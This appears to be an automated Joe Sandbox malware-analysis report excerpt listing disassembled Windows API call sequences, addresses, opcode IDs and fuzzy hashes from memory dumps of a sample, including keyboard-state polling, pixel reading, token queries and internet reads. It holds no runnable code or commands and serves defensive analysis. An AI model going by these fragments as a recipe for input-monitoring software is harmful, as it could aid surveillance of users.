                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$MessageSendShow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3688381893-0
                                                                                                                                                                              • Opcode ID: b429acaa2576cef656fa0ea724dac152841a0a8b910612a351ea19164e2eb5a5
                                                                                                                                                                              • Instruction ID: 4b98f930598076559e563821771a19fb9796c76832f60e87000d5b772082bc09
                                                                                                                                                                              • Opcode Fuzzy Hash: b429acaa2576cef656fa0ea724dac152841a0a8b910612a351ea19164e2eb5a5
                                                                                                                                                                              • Instruction Fuzzy Hash: 834100B4A08504AFD735CF2CCC6EFA67FA5EB49364F151264F988B72E0C270AD40DA50
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                              • Opcode ID: f23771d00f910a44e6e270bd67804ef3c5f5449f103d88cdb327fbf28ff10f39
                                                                                                                                                                              • Instruction ID: cd7fa38ccf39d576baf1ccff31c00317dbb4475da2c3844ab34c471d407bf378
                                                                                                                                                                              • Opcode Fuzzy Hash: f23771d00f910a44e6e270bd67804ef3c5f5449f103d88cdb327fbf28ff10f39
                                                                                                                                                                              • Instruction Fuzzy Hash: 1741A432A002009FDB24DF78C881A6AB7E6EF99314F15456AE915EB355D631ED01CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00DA19E1
                                                                                                                                                                              • ScreenToClient.USER32(00000000,?), ref: 00DA19FE
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00DA1A23
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 00DA1A3D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4210589936-0
                                                                                                                                                                              • Opcode ID: 47cb306b2c48b8eb3d62c0f75e31ac95e09c139848ff4ff08377503bbce08220
                                                                                                                                                                              • Instruction ID: 81f4f4c985db6e305c9d13b2f68eae475d75eb080891e5ef2dc038a22c70f86b
                                                                                                                                                                              • Opcode Fuzzy Hash: 47cb306b2c48b8eb3d62c0f75e31ac95e09c139848ff4ff08377503bbce08220
                                                                                                                                                                              • Instruction Fuzzy Hash: E8415F75A0424AFFDF15AF65C848BFEBB74FB05324F24831AE469A3290C7309A55CB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00E02262
                                                                                                                                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00E0230E
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00E02316
                                                                                                                                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00E02327
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E0232F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3382505437-0
                                                                                                                                                                              • Opcode ID: 41efdd69568d295dfc33117fbc1dbb1646fbdaed5e1626186bf424ec84a30f4a
                                                                                                                                                                              • Instruction ID: ffa579a5239fa7af1dcf22f304b4f914e4f0ba6b13c36fe21af98d3bdb68904f
                                                                                                                                                                              • Opcode Fuzzy Hash: 41efdd69568d295dfc33117fbc1dbb1646fbdaed5e1626186bf424ec84a30f4a
                                                                                                                                                                              • Instruction Fuzzy Hash: 5931B171900219EFDB14CFA8DD8DADE7BB5EB04319F104229FA25BB2E0C7709984DB91
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00E1CC63,00000000), ref: 00E1D97D
                                                                                                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00E1D9B4
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,?,00E1CC63,00000000), ref: 00E1D9F9
                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E1CC63,00000000), ref: 00E1DA0D
                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E1CC63,00000000), ref: 00E1DA37
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3191363074-0
                                                                                                                                                                              • Opcode ID: 17db87f0ac636c8c277f27380e051b5301fe21f5e83c80fc3444d75889406221
                                                                                                                                                                              • Instruction ID: 2d7d21a0fa2f719da1a385d37d48f79ab1bfcb6cdffd4d26358a679e46a79c20
                                                                                                                                                                              • Opcode Fuzzy Hash: 17db87f0ac636c8c277f27380e051b5301fe21f5e83c80fc3444d75889406221
                                                                                                                                                                              • Instruction Fuzzy Hash: 50314B71508205EFDB24DFA6DC84AEBBBF8EF44354B10942EF546E3150D770AE849B60
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E361E4
                                                                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E3623C
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E3624E
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E36259
                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E362B5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 763830540-0
                                                                                                                                                                              • Opcode ID: a93f8b42ebd94b05a72e9e239d9118bfdeba4d378dd8d4f47c5f79e2bb6e35a2
                                                                                                                                                                              • Instruction ID: 40b4950e549e9d2815a4a1aec0bbbe596e5df41e73418d249424513ce3354f6c
                                                                                                                                                                              • Opcode Fuzzy Hash: a93f8b42ebd94b05a72e9e239d9118bfdeba4d378dd8d4f47c5f79e2bb6e35a2
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A218571904218AADB119F65DC88EEE7FB8EF44314F14921AF925FB290D7709985CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00E213AE
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00E213C5
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00E21401
                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00E2140D
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00E21445
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4156661090-0
                                                                                                                                                                              • Opcode ID: bea9d72db4554a5fbbd9a1c7b71968a6a6c9a9fabc5047fa1919f60c719f66a0
                                                                                                                                                                              • Instruction ID: 6aceb1fab723f92bb87569e86d57d3b89881cfa0cb33f9553110a93aa574618c
                                                                                                                                                                              • Opcode Fuzzy Hash: bea9d72db4554a5fbbd9a1c7b71968a6a6c9a9fabc5047fa1919f60c719f66a0
                                                                                                                                                                              • Instruction Fuzzy Hash: FD21AE36600218AFDB04EF65DC89A9EBBF5EF48300B058479F85AE7351CA30AD44CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00DDD146
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DDD169
                                                                                                                                                                                • Part of subcall function 00DD3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DC6A79,?,0000015D,?,?,?,?,00DC85B0,000000FF,00000000,?,?), ref: 00DD3BC5
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DDD18F
                                                                                                                                                                              • _free.LIBCMT ref: 00DDD1A2
                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DDD1B1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                              • Opcode ID: 9b0e0bd07e1630fc0b5e24675c6299d9ef1d1f372dc14bc6dceff251d48b72b6
                                                                                                                                                                              • Instruction ID: e1f65cedf2386e133b1eca421b697d9ae8e3540ab2e59c0b258ce2faf9be6658
                                                                                                                                                                              • Opcode Fuzzy Hash: 9b0e0bd07e1630fc0b5e24675c6299d9ef1d1f372dc14bc6dceff251d48b72b6
                                                                                                                                                                              • Instruction Fuzzy Hash: B30171766067197F2B316AAAAC8CD7B7A6FDFC2B61319012BF904D6344DA608D0681B1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(0000000A,?,?,00DCF64E,00DC545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DD3170
                                                                                                                                                                              • _free.LIBCMT ref: 00DD31A5
                                                                                                                                                                              • _free.LIBCMT ref: 00DD31CC
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DD31D9
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DD31E2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                              • Opcode ID: a7ca638b393a633e0139715b549d9c3305170b16d1ada3993c7c81c7bb433e81
                                                                                                                                                                              • Instruction ID: 7568bd8f5de06581082f67ec04e5b72d14192a26240bc8a9365c68456b67b24c
                                                                                                                                                                              • Opcode Fuzzy Hash: a7ca638b393a633e0139715b549d9c3305170b16d1ada3993c7c81c7bb433e81
                                                                                                                                                                              • Instruction Fuzzy Hash: 6F01F9726497022F96122776BC49D6B1569DFD13713240427F815B2391EE61CF0A4272
                                                                                                                                                                              APIs
                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?,?,00E00C4E), ref: 00E0091B
                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00936
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00944
                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?), ref: 00E00954
                                                                                                                                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00960
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3897988419-0
                                                                                                                                                                              • Opcode ID: 97147ca13a1ba6dedb4f6a737444c308532365dca41ae3d957eea3525d843167
                                                                                                                                                                              • Instruction ID: 9cdf8cae00f542631577de9e4ff119c0e379e842768b8be9e132cf87f387b4a1
                                                                                                                                                                              • Opcode Fuzzy Hash: 97147ca13a1ba6dedb4f6a737444c308532365dca41ae3d957eea3525d843167
                                                                                                                                                                              • Instruction Fuzzy Hash: BA018F76604209AFEB154F56EC48B9A7EBDEBC4752F140124F905F2251DB71DD809BA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00E0F2AE
                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 00E0F2BC
                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00E0F2C4
                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00E0F2CE
                                                                                                                                                                              • Sleep.KERNEL32 ref: 00E0F30A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2833360925-0
                                                                                                                                                                              • Opcode ID: d59ff5e7577e0222adfd2bec56986bbb7cc994f0000dfccabde1925997ab59c7
                                                                                                                                                                              • Instruction ID: 843e85ba5a972b75bf6e676b0956bea1f2b2e976f480bae1c1f8416c2baed9aa
                                                                                                                                                                              • Opcode Fuzzy Hash: d59ff5e7577e0222adfd2bec56986bbb7cc994f0000dfccabde1925997ab59c7
                                                                                                                                                                              • Instruction Fuzzy Hash: 49015771C0661DDBCF14AFE5EC4DAEEBB78FB08721F001466E541B2290DB3495A8C7A1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E01A60
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A6C
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A7B
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A82
                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E01A99
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 842720411-0
                                                                                                                                                                              • Opcode ID: 43f81ba7a8934e5cf10bfcf34ebc85439010727d8d65c3906ae3b9106c36321b
                                                                                                                                                                              • Instruction ID: 78152d4d7b3a6dbe2c5d3ce688e2fc5f875a2a165722ca7cb80fdf677615a1df
                                                                                                                                                                              • Opcode Fuzzy Hash: 43f81ba7a8934e5cf10bfcf34ebc85439010727d8d65c3906ae3b9106c36321b
                                                                                                                                                                              • Instruction Fuzzy Hash: 3C018CB9601209BFDB114FA6EC4DE6A3F7EEF883A4B210454F845E72A0DB31DC508A60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E01976
                                                                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E01982
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E01991
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E01998
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E019AE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                              • Opcode ID: 0ef5bcbaff5a4dedc15b7d50dd9943d929cdee40d40a60aa4d5f3d8f7d940608
                                                                                                                                                                              • Instruction ID: a6433ea4edc6c86538e1d44007bb4d298cf3be31d64d1f53ba161ee908508b2f
                                                                                                                                                                              • Opcode Fuzzy Hash: 0ef5bcbaff5a4dedc15b7d50dd9943d929cdee40d40a60aa4d5f3d8f7d940608
                                                                                                                                                                              • Instruction Fuzzy Hash: D7F06275104305AFD7214F65EC9DF563F6DEFC97A0F110414F945EB290CA71DC548A60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E01916
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E01922
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E01931
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E01938
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E0194E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 44706859-0
                                                                                                                                                                              • Opcode ID: bb0f7f2ac101494285db5eb204f13f46954ad8956378bb5173dede2a92748f6a
                                                                                                                                                                              • Instruction ID: fc66e9093d45bcb8250a25d84d48101abb4e237f73ab5a0a64cced988df8d2e3
                                                                                                                                                                              • Opcode Fuzzy Hash: bb0f7f2ac101494285db5eb204f13f46954ad8956378bb5173dede2a92748f6a
